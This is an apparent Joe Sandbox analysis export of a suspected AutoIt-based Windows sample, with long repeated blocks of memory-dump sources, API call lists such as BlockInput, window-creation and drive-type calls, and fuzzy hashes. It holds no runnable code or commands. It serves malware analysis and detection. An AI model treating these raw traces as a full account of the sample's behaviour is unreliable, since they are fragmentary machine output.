                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: ba0fe2cbd89d1104abc70246c46ce5f39002e2a64d93fcab36b1d7cb9c6718e9
                                                      • Instruction ID: 69a5ef5dbe0ac39e2a4f9b76505f5a647fb9698a8c516ba164072c7f3f508c5e
                                                      • Opcode Fuzzy Hash: ba0fe2cbd89d1104abc70246c46ce5f39002e2a64d93fcab36b1d7cb9c6718e9
                                                      • Instruction Fuzzy Hash: 46B18D32A10608CFD714CF28C486B647BE0FF05366F658658EDA9CF2A2C735D989DB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: f691e001273456588f5e4e13bb556d8f43749808b68cfea37d9e158be7a83fe1
                                                      • Instruction ID: c4543240a4b9d1b54f4ad59e86494994da8b6a099d79a8b16149e7025da8970a
                                                      • Opcode Fuzzy Hash: f691e001273456588f5e4e13bb556d8f43749808b68cfea37d9e158be7a83fe1
                                                      • Instruction Fuzzy Hash: 56125F71D002299BCB14CF58C891BEEB7B5FF48720F14819AE949EB251DB349E81EF91
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00F9EABD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 204a72abde76e9842cbc0dc7ffa9c4d7e3893c627e2529c2f1d38bd79529dbe1
                                                      • Instruction ID: 71e439db0a4e22c7094d468bf6216f69cbc5cc3c3a17e20f5bfa4398449296ac
                                                      • Opcode Fuzzy Hash: 204a72abde76e9842cbc0dc7ffa9c4d7e3893c627e2529c2f1d38bd79529dbe1
                                                      • Instruction Fuzzy Hash: 98E04F322002149FD710EF59E845E9AF7E9AF98770F048426FC49CB361DB74E8419BE0
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00F403EE), ref: 00F409DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • String ID: 0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047674279.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1160000_0XLuA614VK.jbxd
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00FA2B30
                                                      • DeleteObject.GDI32(00000000), ref: 00FA2B43
                                                      • DestroyWindow.USER32 ref: 00FA2B52
                                                      • GetDesktopWindow.USER32 ref: 00FA2B6D
                                                      • GetWindowRect.USER32(00000000), ref: 00FA2B74
                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00FA2CA3
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00FA2CB1
                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2CF8
                                                      • GetClientRect.USER32(00000000,?), ref: 00FA2D04
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FA2D40
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D62
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D75
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D80
                                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D89
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2D98
                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2DA1
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2DA8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FA2DB3
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2DC5
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FBFC38,00000000), ref: 00FA2DDB
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FA2DEB
                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00FA2E11
                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00FA2E30
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA2E52
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FA303F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 947254e9847aeaa9e72baa4a057efb9803acbfb2a18f469f5c942ba8218e60e8
                                                      • Instruction ID: 3967800effb624a8a6de343041a17dca3cc1a753eb94951a476dc142e9b3aafb
                                                      • Opcode Fuzzy Hash: 947254e9847aeaa9e72baa4a057efb9803acbfb2a18f469f5c942ba8218e60e8
                                                      • Instruction Fuzzy Hash: A0024E71A00219AFDB14DF68CC89EAE7BB9FF49720F048158F915AB2A1C7749D01EF60
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00FB712F
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FB7160
                                                      • GetSysColor.USER32(0000000F), ref: 00FB716C
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00FB7186
                                                      • SelectObject.GDI32(?,?), ref: 00FB7195
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FB71C0
                                                      • GetSysColor.USER32(00000010), ref: 00FB71C8
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00FB71CF
                                                      • FrameRect.USER32(?,?,00000000), ref: 00FB71DE
                                                      • DeleteObject.GDI32(00000000), ref: 00FB71E5
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00FB7230
                                                      • FillRect.USER32(?,?,?), ref: 00FB7262
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB7284
                                                        • Part of subcall function 00FB73E8: GetSysColor.USER32(00000012), ref: 00FB7421
                                                        • Part of subcall function 00FB73E8: SetTextColor.GDI32(?,?), ref: 00FB7425
                                                        • Part of subcall function 00FB73E8: GetSysColorBrush.USER32(0000000F), ref: 00FB743B
                                                        • Part of subcall function 00FB73E8: GetSysColor.USER32(0000000F), ref: 00FB7446
                                                        • Part of subcall function 00FB73E8: GetSysColor.USER32(00000011), ref: 00FB7463
                                                        • Part of subcall function 00FB73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FB7471
                                                        • Part of subcall function 00FB73E8: SelectObject.GDI32(?,00000000), ref: 00FB7482
                                                        • Part of subcall function 00FB73E8: SetBkColor.GDI32(?,00000000), ref: 00FB748B
                                                        • Part of subcall function 00FB73E8: SelectObject.GDI32(?,?), ref: 00FB7498
                                                        • Part of subcall function 00FB73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00FB74B7
                                                        • Part of subcall function 00FB73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FB74CE
                                                        • Part of subcall function 00FB73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00FB74DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 4888376bd404de51db68c480c43f9f4e86e9e8434c1be4ab09a5ba5706f9b33a
                                                      • Instruction ID: 4277e910076a50b7e11f1922f7bd2f0722bb9ba6940ec8c1eb0ccf9e2cc40b47
                                                      • Opcode Fuzzy Hash: 4888376bd404de51db68c480c43f9f4e86e9e8434c1be4ab09a5ba5706f9b33a
                                                      • Instruction Fuzzy Hash: E1A1A472408305AFD710AF65DC88E9B77A9FF89320F140B19F9A2961E1D731E944EFA1
                                                      APIs
                                                      • DestroyWindow.USER32(?,?), ref: 00F38E14
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F76AC5
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F76AFE
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F76F43
                                                        • Part of subcall function 00F38F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F38BE8,?,00000000,?,?,?,?,00F38BBA,00000000,?), ref: 00F38FC5
                                                      • SendMessageW.USER32(?,00001053), ref: 00F76F7F
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F76F96
                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F76FAC
                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00F76FB7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 2760611726-4108050209
                                                      • Opcode ID: 691caa02bf74304fce77207674a324eebd83d42270de909aaef4e10396f86152
                                                      • Instruction ID: bb0946e0392864d08af223d4bd598e5e07483e900d4b4a68f78073665fb0a689
                                                      • Opcode Fuzzy Hash: 691caa02bf74304fce77207674a324eebd83d42270de909aaef4e10396f86152
                                                      • Instruction Fuzzy Hash: 56129D30A00605DFD725CF24C884BA6BBA5FF45320F14856AF489DB261CB75AC92FF92
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00FA273E
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FA286A
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00FA28A9
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00FA28B9
                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00FA2900
                                                      • GetClientRect.USER32(00000000,?), ref: 00FA290C
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00FA2955
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FA2964
                                                      • GetStockObject.GDI32(00000011), ref: 00FA2974
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FA2978
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00FA2988
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA2991
                                                      • DeleteDC.GDI32(00000000), ref: 00FA299A
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FA29C6
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FA29DD
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00FA2A1D
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FA2A31
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FA2A42
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00FA2A77
                                                      • GetStockObject.GDI32(00000011), ref: 00FA2A82
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FA2A8D
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00FA2A97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: b498dd16201ca3ced12748cb0e31e9fe3b173a40314e30803cd943d188040811
                                                      • Instruction ID: 53c4373eb2515f07c105feaa44bf5bc2734694479ac605afb86905b4a8d6a369
                                                      • Opcode Fuzzy Hash: b498dd16201ca3ced12748cb0e31e9fe3b173a40314e30803cd943d188040811
                                                      • Instruction Fuzzy Hash: D2B13CB1A00219AFEB14DF68DC86EAB7BA9FF49710F004215F915EB290D774ED40DBA0
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F94AED
                                                      • GetDriveTypeW.KERNEL32(?,00FBCB68,?,\\.\,00FBCC08), ref: 00F94BCA
                                                      • SetErrorMode.KERNEL32(00000000,00FBCB68,?,\\.\,00FBCC08), ref: 00F94D36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
